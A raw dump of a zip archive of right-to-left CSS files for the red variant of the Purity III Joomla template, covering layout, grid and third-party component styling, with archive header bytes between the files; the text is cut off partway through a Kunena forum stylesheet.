  top: -1px;
  right: 2px;
}
.magazine-category-title > a {
  display: inline-block;
  color: #444444;
  text-transform: uppercase;
}
.magazine-category-title > a:hover,
.magazine-category-title > a:active,
.magazine-category-title > a:focus {
  text-decoration: none;
  color: #cc0000;
}
.magazine-item .page-header {
  padding-bottom: 0;
  margin-bottom: 5px;
  border-bottom: 0;
}
.magazine-item .page-header h2 {
  margin: 0;
  font-size: 16px;
  line-height: 1.275;
  font-weight: 700;
}
.magazine-item .page-header h2 a:hover,
.magazine-item .page-header h2 a:active,
.magazine-item .page-header h2 a:focus {
  text-decoration: none;
}
.magazine-item .item-image {
  overflow: hidden;
}
.magazine-item .item-image,
.magazine-item .pull-left.item-image,
.magazine-item .pull-right.item-image {
  width: 100%;
  max-width: 100%;
  float: none !important;
  margin-bottom: 20px;
}
.magazine-item .item-image img,
.magazine-item .pull-left.item-image img,
.magazine-item .pull-right.item-image img,
.magazine-item .img_caption {
  width: 100% !important;
  max-width: 100%;
}
.magazine-item .article-aside {
  margin-top: 10px;
  margin-bottom: 10px;
}
.magazine-item .article-info {
  color: #999999;
  margin: 0;
  width: 100%;
}
.magazine-item .article-info dd {
  white-space: inherit;
}
.magazine-item-ct p:last-child {
  margin-bottom: 0;
}
.magazine-leading {
  margin-bottom: 20px;
}
.magazine-leading .magazine-item {
  margin-bottom: 20px;
}
.magazine-leading .magazine-item .page-header h2 {
  font-size: 35px;
}
@media screen and (min-width: 768px) {
  .magazine-leading .magazine-item .item-image {
    max-height: 300px;
  }
}
.magazine-leading .magazine-item .magazine-item-ct {
  font-size: 16px;
}
.magazine-intro {
  margin-bottom: 20px;
}
.magazine-intro .magazine-item {
  margin-bottom: 20px;
}
.magazine-intro .magazine-item .item-image {
  max-height: 120px;
}
.magazine-intro .magazine-item .item-image p.img_caption {
  display: none;
}
.magazine-links {
  margin-top: 40px;
}
.magazine-links::before {
  display: inline-block;
  content: "MORE NEWS";
  background: #444444;
  font-weight: normal;
  padding: 5px 10px;
  margin-bottom: 10px;
  color: #fff;
}
.magazine-links .link-item {
  border-bottom: 1px solid #eeeeee;
  padding: 10px 0 9px;
}
.magazine-links .page-header {
  margin: 0;
}
.magazine-links .page-header h2 {
  font-size: 16px;
}
.magazine-links .article-aside {
  margin-top: 5px;
  margin-bottom: 0;
}
.magazine-featured-links {
  margin-top: 0;
  margin-bottom: 40px;
}
.magazine-category {
  margin-bottom: 40px;
}
.magazine-category .row-articles {
  margin-bottom: 20px;
}
.magazine-category .row-articles:last-child {
  margin-bottom: 0;
}
@media screen and (min-width: 992px) {
  .magazine-category .row-articles .magazine-item-media {
    padding-left: 0;
  }
}
.magazine-category .magazine-leading {
  margin-bottom: 40px;
}
.magazine-category .magazine-item .category-name {
  display: none;
}
.magazine-category .magazine-item-ct {
  color: #666666;
  font-size: 12px;
}PKӜ�\�.��,purity_iii/css/rtl/red/layouts/corporate.cssnu&1i�.corporate .slideshow {
  background: #f7f7f7;
  border-bottom: 1px solid #eeeeee;
  padding: 40px 0;
}
.corporate .t3-sl-1 {
  border-bottom: 1px solid #eeeeee;
}
.corporate .t3-sl-1 .t3-module,
.corporate .t3-sl-2 .t3-module,
.corporate .t3-sl-3 .t3-module {
  margin-bottom: 0;
}
.corporate .t3-sl-2 {
  padding: 0;
}
.corporate .carousel-caption {
  background: rgba(0, 0, 0, 0.3);
}
.corporate .t3-module .media {
  border-bottom: 1px solid #eeeeee;
  padding-bottom: 10px;
}
.corporate .t3-module .media:last-child {
  border: 0;
  padding: 0;
}
.corporate .items-leading {
  border-bottom: 1px solid #eeeeee;
  margin-bottom: 40px;
}
.corporate .items-row {
  border-bottom: 1px solid #eeeeee;
}
.corporate .items-row:last-child {
  border: 0;
}PKӜ�\'�pd��'purity_iii/css/rtl/red/layouts/blog.cssnu&1i�.blog .blog-item {
  border-bottom: 1px solid #eeeeee;
  margin-bottom: 40px;
  padding-bottom: 40px;
}
.blog .blog-item .item-image {
  margin-top: 7px;
  margin-left: 0;
}
.blog .blog-item .item-image.pull-left {
  max-width: 100%;
}
@media screen and (max-width: 767px) {
  .blog .blog-item .item-image.pull-left {
    float: none !important;
  }
}
.blog .blog-item .item-image img {
  max-width: 100%;
  width: 100%;
}
.blog .blog-item .page-header {
  border: 0;
  margin: 0 0 10px;
  padding: 0;
}
.blog .blog-item .page-header h2 {
  margin: 0;
  line-height: 1.3;
}
.blog .blog-item .page-header h2 a:hover,
.blog .blog-item .page-header h2 a:focus,
.blog .blog-item .page-header h2 a:active {
  color: #800000;
}
.blog .blog-item .article-intro {
  margin-bottom: 20px;
}
.blog .item-page .tags {
  border-bottom: 1px solid #eeeeee;
  margin-bottom: 20px;
}
.blog .item-page .tags span a {
  background: #eeeeee;
}PKӜ�\1purity_iii/css/rtl/red/layouts/features-intro.cssnu&1i�PKӜ�\LMN��'purity_iii/css/rtl/red/layouts/docs.cssnu&1i�.docs-section {
  margin-bottom: 40px;
}
.docs-section .page-header {
  margin-bottom: 20px;
}
.docs-section .page-header h1 {
  font-size: 42px;
}
.example-type h1,
.example-type h2,
.example-type h3,
.example-type h4,
.example-type h5,
.example-type h6 {
  margin: 20px 0;
}
.example-colors .swatch-item {
  width: 100%;
  min-height: 100px;
  position: relative;
  background: #444444;
  color: #fff;
  margin-bottom: 20px;
}
.example-colors .swatch-item dl {
  width: 100%;
  position: absolute;
  bottom: 0;
  padding: 20px;
  margin: 0;
}
.example-colors .color-brand-primary {
  background: #cc0000;
}
.example-colors .color-brand-secondary {
  background: #3e9b52;
}
.example-colors .color-brand-success {
  background: #3e9b52;
}
.example-colors .color-brand-danger {
  background: #cc0000;
}
.example-colors .color-brand-warning {
  background: #ff8800;
}
.example-colors .color-brand-info {
  background: #0099cc;
}
.example-colors .color-gray-darker {
  background: #222222;
}
.example-colors .color-gray-dark {
  background: #444444;
}
.example-colors .color-gray {
  background: #666666;
}
.example-colors .color-gray-light {
  background: #999999;
  color: #444444;
}
.example-colors .color-gray-lighter {
  background: #eeeeee;
  color: #444444;
}
.example-colors .color-gray-lightest {
  background: #f7f7f7;
  color: #444444;
}
.example-buttons .btn,
.example-inputs .btn,
.example-buttons .form-control,
.example-inputs .form-control {
  width: 100%;
  margin-bottom: 20px;
}PKӜ�\Ў+purity_iii/css/rtl/red/layouts/porfolio.cssnu&1i�.porfolio .page-header {
  text-align: center;
  border-bottom: 0;
  margin-top: 10px;
  margin-bottom: 0;
  padding: 0;
}
.porfolio-items {
  margin-top: 20px;
  padding-top: 20px;
  border-top: 1px solid #eeeeee;
  text-align: center;
}
.porfolio-items .thumbnail {
  border: 0;
  padding: 0;
  margin: 20px 0;
}
.porfolio-items .thumbnail > a {
  color: #444444;
  text-decoration: none;
}
.porfolio-items .thumbnail > a:hover,
.porfolio-items .thumbnail > a:active,
.porfolio-items .thumbnail > a:focus {
  color: #cc0000;
  text-decoration: none;
}
.porfolio-items .item-image {
  float: none !important;
  border: 1px solid #eeeeee;
  padding: 3px;
  position: relative;
  -webkit-transition: border-color 0.2s ease-in;
  -o-transition: border-color 0.2s ease-in;
  transition: border-color 0.2s ease-in;
}
.porfolio-items .item-image img {
  width: 100%;
  padding: 0;
}
.porfolio-items .thumbnail > a:hover .item-image,
.porfolio-items .thumbnail > a:active .item-image,
.porfolio-items .thumbnail > a:focus .item-image {
  border-color: #bbbbbb;
}
.porfolio-items .thumbnail > a:hover .item-image img,
.porfolio-items .thumbnail > a:active .item-image img,
.porfolio-items .thumbnail > a:focus .item-image img {
  opacity: .7;
}
.porfolio-items h3 {
  margin-top: 20px;
  margin-bottom: 5px;
  font-weight: 700;
  font-size: 18px;
}
.porfolio-items p {
  color: #666666;
  margin: 0;
}
.porfolio .item-state {
  width: 70px;
  height: 70px;
  background: url(../../../../images/porfolio-item-states.png) no-repeat center top;
  display: block;
  text-indent: -9999em;
  position: absolute;
  top: -3px;
  left: -3px;
}
.porfolio .state-free {
  background-position: center;
}
.porfolio .state-hot {
  background-position: center bottom;
}
.porfolio .item-demo-url {
  display: inline-block;
  margin-top: 20px;
}PKӜ�\�('�

&purity_iii/css/rtl/red/legacy-grid.cssnu&1i�.row-flex {
  display: flex;
  flex-wrap: wrap;
  align-items: stretch;
}
.row-fluid {
  margin-left: -20px;
  margin-right: -20px;
}
[class*="span"] {
  float: right;
}
.span1, .span2, .span3, .span4, .span5, .span6, .span7, .span8, .span9, .span10, .span11, .span12 {
  position: relative;
  min-height: 1px;
  padding-right: 20px;
  padding-left: 20px;
}
.span12 {
  width: 100%;
}
.span11 {
  width: 91.66666667%;
}
.span10 {
  width: 83.33333333%;
}
.span9 {
  width: 75%;
}
.span8 {
  width: 66.66666667%;
}
.span7 {
  width: 58.33333333%;
}
.span6 {
  width: 50%;
}
.span5 {
  width: 41.66666667%;
}
.span4 {
  width: 33.33333333%;
}
.span3 {
  width: 25%;
}
.span2 {
  width: 16.66666667%;
}
.span1 {
  width: 8.33333333%;
}
.offset12 {
  margin-right: 100%;
}
.offset11 {
  margin-right: 91.66666667%;
}
.offset10 {
  margin-right: 83.33333333%;
}
.offset9 {
  margin-right: 75%;
}
.offset8 {
  margin-right: 66.66666667%;
}
.offset7 {
  margin-right: 58.33333333%;
}
.offset6 {
  margin-right: 50%;
}
.offset5 {
  margin-right: 41.66666667%;
}
.offset4 {
  margin-right: 33.33333333%;
}
.offset3 {
  margin-right: 25%;
}
.offset2 {
  margin-right: 16.66666667%;
}
.offset1 {
  margin-right: 8.33333333%;
}
.offset0 {
  margin-right: 0%;
}
.visible-phone {
  display: none !important;
}
.visible-tablet {
  display: none !important;
}
.hidden-desktop {
  display: none !important;
}
.visible-desktop {
  display: inherit !important;
}
@media (min-width: 768px) and (max-width: 979px) {
  .hidden-desktop {
    display: inherit !important;
  }
  .visible-desktop {
    display: none !important;
  }
  .visible-tablet {
    display: inherit !important;
  }
  .hidden-tablet {
    display: none !important;
  }
}
@media (max-width: 767px) {
  .hidden-desktop {
    display: inherit !important;
  }
  .visible-desktop {
    display: none !important;
  }
  .visible-phone {
    display: inherit !important;
  }
  .hidden-phone {
    display: none !important;
  }
}
.width-10 {
  width: 10px;
}
.width-20 {
  width: 20px;
}
.width-30 {
  width: 30px;
}
.width-40 {
  width: 40px;
}
.width-50 {
  width: 50px;
}
.width-60 {
  width: 60px;
}
.width-70 {
  width: 70px;
}
.width-80 {
  width: 80px;
}
.width-90 {
  width: 90px;
}
.width-100 {
  width: 100px;
}
.height-10 {
  height: 10px;
}
.height-20 {
  height: 20px;
}
.height-30 {
  height: 30px;
}
.height-40 {
  height: 40px;
}
.height-50 {
  height: 50px;
}
.height-60 {
  height: 60px;
}
.height-70 {
  height: 70px;
}
.height-80 {
  height: 80px;
}
.height-90 {
  height: 90px;
}
.height-100 {
  height: 100px;
}PKӜ�\�S�??/purity_iii/css/rtl/red/extras/com_community.cssnu&1i�.com_community #community-wrap label input,
.com_community #community-wrap .form-field input {
  display: inline-block;
  margin-top: 0;
  vertical-align: middle;
}
.com_community #community-wrap .row-fluid.hero-area {
  margin: 0;
}
.com_community #community-wrap .cGuest .row-fluid.hero-area {
  margin-right: 0;
  margin-left: 0;
}
.com_community #community-wrap .js_dropDownMaster dt,
.com_community #community-wrap .js_dropDownParent li > a {
  height: 28px;
}
.com_community #community-wrap .joms-select {
  box-shadow: none;
}
.com_community #community-wrap .js-toolbar .navbar-inner {
  min-height: 40px;
}
.com_community #community-wrap .js-toolbar .nav-collapse {
  display: block;
}
.com_community #community-wrap .js-toolbar .nav > li > a {
  height: 38px;
  line-height: 25px;
}
.com_community #community-wrap .js-toolbar .dropdown-menu > li {
  border: 0;
}
.com_community #community-wrap .cStream-Content .row-fluid {
  margin-right: 0;
  margin-left: 0;
}
.com_community #community-wrap .joms-postbox-input .inputbox {
  box-shadow: none;
}
.com_community #community-wrap .joms-postbox-input .input-status {
  box-shadow: none;
  padding: 10px;
  overflow-y: auto;
  min-height: 160px !important;
}
.com_community #community-wrap .joms-postbox-input {
  overflow-y: scroll !important;
}
.com_community #community-wrap .joms-postbox-event .joms-postbox-dropdown .picker__select--month,
.com_community #community-wrap .joms-postbox-event .joms-postbox-dropdown .picker__select--year {
  display: inline-block;
}
.com_community #community-wrap .cProfile-Preferences .js_dropDownMaster dt,
.com_community #community-wrap .cProfile-Preferences .js_dropDownParent li > a {
  height: 26px;
  line-height: 20px;
}
.com_community #community-wrap .cProfile-Preferences label input {
  display: inline-block;
  margin-top: 0;
  vertical-align: middle;
}
.com_community #community-wrap .cSearch .label-checkbox input {
  display: inline-block;
  margin-top: 0;
  vertical-align: middle;
}
.com_community #community-wrap .advance-search label input {
  display: inline-block;
  margin-top: 0;
  vertical-align: middle;
}
.com_community #community-wrap .cGroups-Create label input {
  display: inline-block;
  margin-top: 0;
  vertical-align: middle;
}
.com_community #community-wrap .joms-page .joms-form__group select,
.com_community #community-wrap .joms-page .joms-form__group textarea,
.com_community #community-wrap .joms-page .joms-form__group input[type="text"],
.com_community #community-wrap .joms-page .joms-form__group input[type="password"],
.com_community #community-wrap .joms-page .joms-form__group input[type="datetime"],
.com_community #community-wrap .joms-page .joms-form__group input[type="datetime-local"],
.com_community #community-wrap .joms-page .joms-form__group input[type="date"],
.com_community #community-wrap .joms-page .joms-form__group input[type="month"],
.com_community #community-wrap .joms-page .joms-form__group input[type="time"],
.com_community #community-wrap .joms-page .joms-form__group input[type="week"],
.com_community #community-wrap .joms-page .joms-form__group input[type="number"],
.com_community #community-wrap .joms-page .joms-form__group input[type="email"],
.com_community #community-wrap .joms-page .joms-form__group input[type="url"],
.com_community #community-wrap .joms-page .joms-form__group input[type="search"],
.com_community #community-wrap .joms-page .joms-form__group input[type="tel"],
.com_community #community-wrap .joms-page .joms-form__group input[type="color"],
.com_community #community-wrap .joms-page .joms-form__group .inputbox {
  display: inline-block;
}
.com_community #community-wrap .joms-page .joms-form__group .joms-button--privacy {
  margin-left: 15px;
}
.com_community #community-wrap .joms-page .joms-form__group .joms-checkbox input {
  margin-top: 8px;
}
.com_community #community-wrap .jomsocial .joms-body .joms-focus__header__actions--desktop a {
  font-size: 2.5rem;
}
.com_community #community-wrap .jomsocial .joms-body .joms-focus__header__actions--desktop .joms-icon {
  width: 24px;
  height: 24px;
}
.com_community #community-wrap .jomsocial .joms-body a.joms-button--viewed.nolink span {
  margin: 0;
  padding-right: 15px;
}
.picker {
  background: green !important;
}
.picker .picker__box .picker__header {
  display: flex;
}
.picker .picker__box .picker__header .picker__select--month {
  margin-right: 20px;
}PKӜ�\+e���1purity_iii/css/rtl/red/extras/com_joomprofile.cssnu&1i�.com_joomprofile #f90pro .f90pro-wrapper .f90pro-avtar img {
  width: 100%;
}
.com_joomprofile #f90pro .f90pro-wrapper #f90pro-detail .f90pro-left h3 {
  font-size: 18px;
  line-height: 1.5;
}PKӜ�\�?���1purity_iii/css/rtl/red/extras/com_easydiscuss.cssnu&1i�#discuss-wrapper .nav-collapse.collapse {
  display: block;
}
#discuss-wrapper .nav-collapse.collapse .modal-body .row-fluid {
  margin-right: 0;
  margin-left: 0;
}PKӜ�\�� �QQ.purity_iii/css/rtl/red/extras/com_mijoshop.cssnu&1i�.com_mijoshop .common-home #content_oc h1,
.com_mijoshop .common-home #content_oc h2 {
  font-size: 24px;
}
.com_mijoshop .box_oc .box-product {
  margin-right: 0;
  padding: 20px;
}
.com_mijoshop .box_oc .box-product > div {
  float: right;
  margin: 0;
  margin-left: 20px;
  width: 100%;
}
.com_mijoshop .box_oc .box-product > div .image {
  display: inline-block;
  border: 1px solid #eeeeee;
  padding: 5px;
  text-align: right;
}
.com_mijoshop .box_oc .box-product > div .image a {
  display: inline-block;
}
.com_mijoshop .box_oc .box-product > div .image img {
  border: 0;
  padding: 0;
}
.com_mijoshop .box_oc .box-product > div .name {
  padding: 10px 0;
  text-align: right;
}
.com_mijoshop .box_oc .box-product > div .price {
  margin: 10px 0;
}
.com_mijoshop .box_oc #tab-related .box-product > div {
  width: auto;
}
.com_mijoshop .box_oc .box-content .content_oc p * {
  margin: 10px 0 10px 10px;
}
.com_mijoshop #header_oc {
  margin: 0 0 20px;
  padding: 0;
}
.com_mijoshop #header_oc #currency {
  top: 0;
}
.com_mijoshop #header_oc #currency a {
  margin-top: 5px;
}
.com_mijoshop #header_oc #cart {
  border-right: 1px solid #eeeeee;
  margin-right: 20px;
  top: 5px;
}
.com_mijoshop #header_oc #cart .heading {
  margin-top: 0;
}
.com_mijoshop #header_oc #search_oc {
  top: 10px;
  width: 120px;
}
.com_mijoshop #header_oc #search_oc input[type="text"] {
  border-radius: 0;
  height: 25px;
  -webkit-box-sizing: border-box;
  -moz-box-sizing: border-box;
  box-sizing: border-box;
}
.com_mijoshop #header_oc .links {
  bottom: 0;
  top: auto;
}
.com_mijoshop #currency .dropdown-menu > li,
.com_mijoshop #top-links .dropdown-menu > li {
  border-color: #eeeeee;
}
.com_mijoshop #currency .dropdown-menu > li a:hover,
.com_mijoshop #top-links .dropdown-menu > li a:hover,
.com_mijoshop #currency .dropdown-menu > li a:focus,
.com_mijoshop #top-links .dropdown-menu > li a:focus {
  color: #ffffff;
}
.com_mijoshop #currency .open a,
.com_mijoshop #top-links .open a {
  color: #444444;
}
.com_mijoshop .mijoshop .product-thumb .image img {
  max-width: 100%;
  width: 100%;
}
.com_mijoshop .mijoshop .product-thumb .caption {
  padding: 15px !important;
}
.com_mijoshop .mijoshop .product-thumb .caption h4 {
  margin: 0 0 10px;
  font-size: 15px;
}
.com_mijoshop .mijoshop .product-thumb .caption h4 a {
  color: #444444;
}
.com_mijoshop .mijoshop .product-thumb .caption h4 a:hover,
.com_mijoshop .mijoshop .product-thumb .caption h4 a:focus {
  color: #cc0000;
}
.com_mijoshop .mijoshop .product-thumb .caption .price {
  font-weight: 700;
  color: #cc0000;
  margin-top: 10px !important;
}
.com_mijoshop .mijoshop .product-thumb .caption .price .price-tax {
  color: #999999;
  font-weight: 400;
}
.com_mijoshop #content_oc > h2 {
  margin-bottom: 30px;
  font-size: 24px;
}
.com_mijoshop #content_oc > p {
  padding: 10px 20px;
  border: 1px solid #eeeeee;
  margin-bottom: 20px !important;
  margin-top: 10px !important;
}
.com_mijoshop #content_oc .product-filter {
  padding-bottom: 10px;
}
.com_mijoshop #content_oc .product-filter .display {
  padding-top: 15px;
}
.com_mijoshop #content_oc .product-grid .product-thumb .caption {
  min-height: 200px !important;
}
.com_mijoshop #content_oc .product-list .product-thumb .image {
  padding: 0 0 0 20px;
  height: 200px;
}
.com_mijoshop #content_oc .product-list .product-thumb .image > a {
  height: 100%;
}
.com_mijoshop #content_oc .product-list .product-thumb .image img {
  max-width: 100%;
  max-height: 100%;
}
.com_mijoshop #content_oc .product-list .product-thumb .caption {
  overflow: hidden;
  margin: 0;
  padding: 20px 0 20px 20px !important;
  min-height: 161px !important;
}
.com_mijoshop .product-info .left {
  width: 30% !important;
}
.com_mijoshop .product-info .right {
  min-height: 352px;
  width: 65% !important;
}
.com_mijoshop .product-info .right .description {
  border-top: 0;
  padding: 0 0 10px;
}
.com_mijoshop .product-info .left .cart div input[type="text"],
.com_mijoshop .product-info .left .cart div input[type="button"] {
  display: inline-block;
}
.com_mijoshop .product-info .left .cart div input[type="text"] {
  padding-right: 5px;
  padding-left: 5px;
}
.com_mijoshop .product-info .right .cart div span {
  color: #999999;
}
.com_mijoshop #tab-description,
.com_mijoshop #tab-review {
  padding: 20px;
}
.com_mijoshop .content_oc ul {
  list-style: none;
  margin: 0;
  padding: 0;
}
.com_mijoshop .cart-info .quantity input[type='text'] {
  -webkit-box-sizing: content-box;
  -moz-box-sizing: content-box;
  box-sizing: content-box;
  height: 28px;
  padding-top: 0;
  padding-bottom: 0;
}
.com_mijoshop .cart-module #coupon input,
.com_mijoshop .cart-module #voucher input {
  display: inline-block;
}
.com_mijoshop .cart-module #shipping table {
  border-bottom: 1px solid #eeeeee;
  margin-bottom: 20px;
}
.com_mijoshop .cart-module #shipping table td {
  padding: 10px 20px;
}
.com_mijoshop .box-category ul li {
  padding: 10px 0 10px 10px;
}
.com_mijoshop #colorbox {
  box-sizing: unset !important;
}
.com_mijoshop #column-right .row > div {
  width: 100%;
  float: none;
}
.com_mijoshop .t3-sidebar .mijoshop .container_oc .row > div {
  width: 100%;
  float: none;
}PKӜ�\k�O���0purity_iii/css/rtl/red/extras/com_easysocial.cssnu&1i�.com_easysocial .es-toolbar .es-navbar-search .search-query::-moz-placeholder {
  color: #ffffff;
}
.com_easysocial .stream-meta {
  margin-right: 0;
  margin-left: 0;
}
.com_easysocial .stream-meta .stream-title .row-fluid {
  margin-right: 0;
  margin-left: 0;
}
.com_easysocial .stream-meta .stream-content .row-fluid {
  margin-right: 0;
  margin-left: 0;
}
.com_easysocial .es-stream-meta .es-stream-title .row-fluid {
  margin-right: 0;
  margin-left: 0;
}
.com_easysocial .dropdown-menu > li {
  border: 0;
}
.com_easysocial #es .app-news .checkbox input[type="checkbox"] {
  position: relative;
  margin-right: 0;
}
#es .o-nav--block {
  white-space: normal;
}
.es {
  clear: both;
}PKӜ�\�l�d��.purity_iii/css/rtl/red/extras/com_easyblog.cssnu&1i�#eblog-wrapper .btn-eb-navbar {
  height: 30px;
  width: 44px;
}
#eblog-wrapper #eblog-search .search-input input {
  height: 30px !important;
}
.ezb-mod.mod_easyblogcategories .mod-item {
  padding-top: 20px !important;
}
div#fd.eb .eb-post + .eb-post {
  border-top: 1px solid #eeeeee;
  padding-top: 40px;
}
.mod-es-recent-blogs .es-nav-blogs {
  margin: 0;
  padding: 0;
}
.mod-es-recent-blogs .es-nav-blogs li {
  list-style-type: none;
}
.mod-es-recent-blogs .es-nav-blogs li .media-object {
  margin-bottom: 20px;
}
.t3-sidebar #fd.mod-es-recent-blogs .media {
  padding: 0 !important;
}
.t3-sidebar #fd.mod-es-recent-blogs .media .media-object {
  float: none !important;
  padding: 0;
  margin: 0 0 20px;
}
.t3-sidebar #fd.mod-es-recent-blogs .media .media-object img {
  max-width: 100%;
}
.mod-easyblogtagcloud .tag-cloud {
  margin: 0 0 5px 10px;
  display: inline-block;
  line-height: normal !important;
}PKӜ�\�%J�o�o,purity_iii/css/rtl/red/extras/com_kunena.cssnu&1i�#kunena.layout .btn-group .dropdown-menu {
  background: #ffffff;
  border-color: #d5d5d5;
}
#kunena.layout .btn-group .dropdown-menu li {
  border-top: 1px solid #d5d5d5;
}
#kunena.layout .btn-group .dropdown-menu li a {
  color: #444444;
}
#kunena.layout .btn-group .dropdown-menu li a:hover {
  background-color: #eeeeee;
}
#kunena.layout .btn-group .dropdown-menu li:empty {
  display: none;
}
#kunena.layout input[type="checkbox"] {
  height: auto;
}
#kunena.layout .navbar {
  background: transparent;
  border: 0;
  border-bottom: 3px solid #cc0000;
  border-radius: 0;
  min-height: 0;
}
#kunena.layout .navbar .nav {
  margin-bottom: 0;
  width: auto;
}
#kunena.layout .navbar .nav > li {
  margin-left: 3px;
  margin-right: 0;
}
#kunena.layout .navbar .nav > li > a {
  background-color: #444444;
  border-radius: 2px 2px 0 0;
  color: #ffffff;
  font-weight: 400;
  line-height: 1.42857143;
  padding: 5px 10px;
  text-transform: none;
}
#kunena.layout .navbar .nav > li > a:hover,
#kunena.layout .navbar .nav > li > a:focus,
#kunena.layout .navbar .nav > li > a:active {
  background-color: #222222;
  box-shadow: none;
}
#kunena.layout .navbar .nav > li.active a {
  background-color: #cc0000;
  box-shadow: none;
}
@media (max-width: 1199px) {
  #kunena.layout .navbar .navbar-nav.pull-left > div {
    padding-top: 10px;
  }
  #kunena.layout .navbar .navbar-nav.pull-left .btn {
    background: #cc0000;
    color: #ffffff;
    text-align: center;
    text-decoration: none;
  }
  #kunena.layout .navbar .navbar-nav.pull-left .knav-collapse {
    background: #ffffff;
    display: none;
    padding: 0;
    position: absolute;
    width: 100%;
    z-index: 10;
  }
  #kunena.layout .navbar .navbar-nav.pull-left .knav-collapse.in {
    display: block;
  }
  #kunena.layout .navbar .navbar-nav.pull-left .knav-collapse .navbar-nav {
    border: 1px solid #eeeeee;
    display: block;
  }
  #kunena.layout .navbar .navbar-nav.pull-left .knav-collapse .navbar-nav li {
    background: #ffffff;
    border: 0;
    margin-left: 0;
  }
  #kunena.layout .navbar .navbar-nav.pull-left .knav-collapse .navbar-nav li a {
    background: #ffffff;
    color: #444444;
  }
  #kunena.layout .navbar .navbar-nav.pull-left .knav-collapse .navbar-nav li a:hover,
  #kunena.layout .navbar .navbar-nav.pull-left .knav-collapse .navbar-nav li a:focus,
  #kunena.layout .navbar .navbar-nav.pull-left .knav-collapse .navbar-nav li a:active {
    color: #cc0000;
  }
  #kunena.layout .navbar .navbar-nav.pull-left .knav-collapse .navbar-nav li.active a {
    color: #cc0000;
  }
  #kunena.layout .navbar .navbar-nav.pull-left .knav-collapse .navbar-nav li + li {
    border-top: 1px solid #eeeeee;
  }
}
#kunena.layout .navbar .mobile-user {
  border-radius: 0;
  color: #444444;
  margin-left: 0;
  margin-top: 0 !important;
  padding: 0;
}
#kunena.layout .navbar .mobile-user .dropdown-toggle {
  background-color: transparent;
  border-radius: 0;
  color: #444444;
  padding: 5px 10px;
  line-height: 20px;
}
#kunena.layout .navbar .mobile-user .dropdown-toggle:hover,
#kunena.layout .navbar .mobile-user .dropdown-toggle:focus,
#kunena.layout .navbar .mobile-user .dropdown-toggle:active {
  background-color: transparent;
}
#kunena.layout .navbar .mobile-user .dropdown-toggle img {
  box-shadow: none;
  height: 17px;
  width: 17px;
}
#kunena.layout .navbar .mobile-user .dropdown-menu {
  background: #ffffff;
  border: 1px solid #eeeeee;
  padding: 20px;
  min-width: 270px;
  right: auto;
  left: 0;
}
#kunena.layout .navbar .mobile-user .dropdown-menu .form-group > div + div {
  margin-top: 10px;
}
#kunena.layout .navbar .mobile-user .dropdown-menu#userdropdownlogin .form-signin {
  padding: 0;
}
#kunena.layout .navbar .mobile-user .dropdown-menu#userdropdownlogin .form-signin .input-group input {
  width: 100%;
}
#kunena.layout .navbar .mobile-user .dropdown-menu#userdropdownlogin .form-signin .thumbnail {
  border: 1px solid #eeeeee;
  line-height: 50px;
  height: 50px;
  width: 50px;
}
#kunena.layout .navbar .mobile-user .dropdown-menu#userdropdownlogin .form-signin .thumbnail .glyphicon {
  font-size: 14px;
  margin: 0;
}
#kunena.layout .navbar .mobile-user .dropdown-menu#userdropdownlogin .form-signin .fa-big {
  color: #666666;
  margin: 0;
}
#kunena.layout .navbar .mobile-user .dropdown-menu#userdropdownlogin .form-signin .list-unstyled li {
  font-size: 11px;
}
#kunena.layout .navbar .mobile-user .dropdown-menu select,
#kunena.layout .navbar .mobile-user .dropdown-menu textarea,
#kunena.layout .navbar .mobile-user .dropdown-menu input[type="text"],
#kunena.layout .navbar .mobile-user .dropdown-menu input[type="password"],
#kunena.layout .navbar .mobile-user .dropdown-menu input[type="datetime"],
#kunena.layout .navbar .mobile-user .dropdown-menu input[type="datetime-local"],
#kunena.layout .navbar .mobile-user .dropdown-menu input[type="date"],
#kunena.layout .navbar .mobile-user .dropdown-menu input[type="month"],
#kunena.layout .navbar .mobile-user .dropdown-menu input[type="time"],
#kunena.layout .navbar .mobile-user .dropdown-menu input[type="week"],
#kunena.layout .navbar .mobile-user .dropdown-menu input[type="number"],
#kunena.layout .navbar .mobile-user .dropdown-menu input[type="email"],
#kunena.layout .navbar .mobile-user .dropdown-menu input[type="url"],
#kunena.layout .navbar .mobile-user .dropdown-menu input[type="search"],
#kunena.layout .navbar .mobile-user .dropdown-menu input[type="tel"],
#kunena.layout .navbar .mobile-user .dropdown-menu input[type="color"],
#kunena.layout .navbar .mobile-user .dropdown-menu .inputbox {
  width: auto;
  display: inline-block;
}
#kunena.layout .navbar .mobile-user .dropdown-menu .divider {
  background: #eeeeee;
  height: 1px;
  margin: 10px 0;
}
#kunena.layout .navbar .mobile-user .dropdown-menu .btn-link {
  color: #666666;
}
#kunena.layout .navbar .mobile-user .dropdown-menu .btn-link:hover,
#kunena.layout .navbar .mobile-user .dropdown-menu .btn-link:focus,
#kunena.layout .navbar .mobile-user .dropdown-menu .btn-link:active {
  color: #cc0000;
}
#kunena.layout .navbar .mobile-user .dropdown-menu .kavatar {
  max-width: 60px;
}
#kunena.layout .navbar .mobile-user .dropdown-menu #status-form {
  padding: 0;
}
#kunena.layout .navbar .mobile-user .dropdown-menu #status-form label {
  border: 0;
  padding: 0;
  margin: 0;
}
#kunena.layout .navbar .mobile-user .dropdown-menu #status-form a.btn {
  border: 0;
  padding: 0;
  margin-bottom: 5px;
}
#kunena.layout .navbar .mobile-user .dropdown-menu .fa {
  margin-left: 5px;
}
#kunena.layout .navbar .mobile-user .dropdown-menu a.btn {
  border: 0;
  padding: 0;
}
#kunena.layout .navbar .mobile-user .dropdown-menu #logout-form {
  padding: 0;
}
#kunena.layout .navbar .mobile-user .dropdown-menu #logout-form .btn {
  border: 0;
  margin: 0;
  padding: 0;
}
@media (max-width: 1199px) {
  #kunena.layout .navbar .mobile-user .dropdown-menu a[data-target="#statusTextModal"] {
    pointer-events: none;
  }
}
#kunena.layout .navbar .mobile-user .list-unstyled li + li {
  margin-top: 5px;
}
#kunena.layout .navbar .mobile-user #nav-menu.dropdown-menu {
  right: auto;
  left: 0;
  width: 250px;
}
#kunena.layout .navbar .mobile-user #nav-menu.dropdown-menu a {
  color: #444444;
}
#kunena.layout .navbar .mobile-user #nav-menu.dropdown-menu a:hover,
#kunena.layout .navbar .mobile-user #nav-menu.dropdown-menu a:focus,
#kunena.layout .navbar .mobile-user #nav-menu.dropdown-menu a:active {
  color: #800000;
}
#kunena.layout .navbar .mobile-user #nav-menu.dropdown-menu #status-form {
  padding: 0 10px;
}
#kunena.layout .navbar .mobile-user #nav-menu.dropdown-menu #status-form > div {
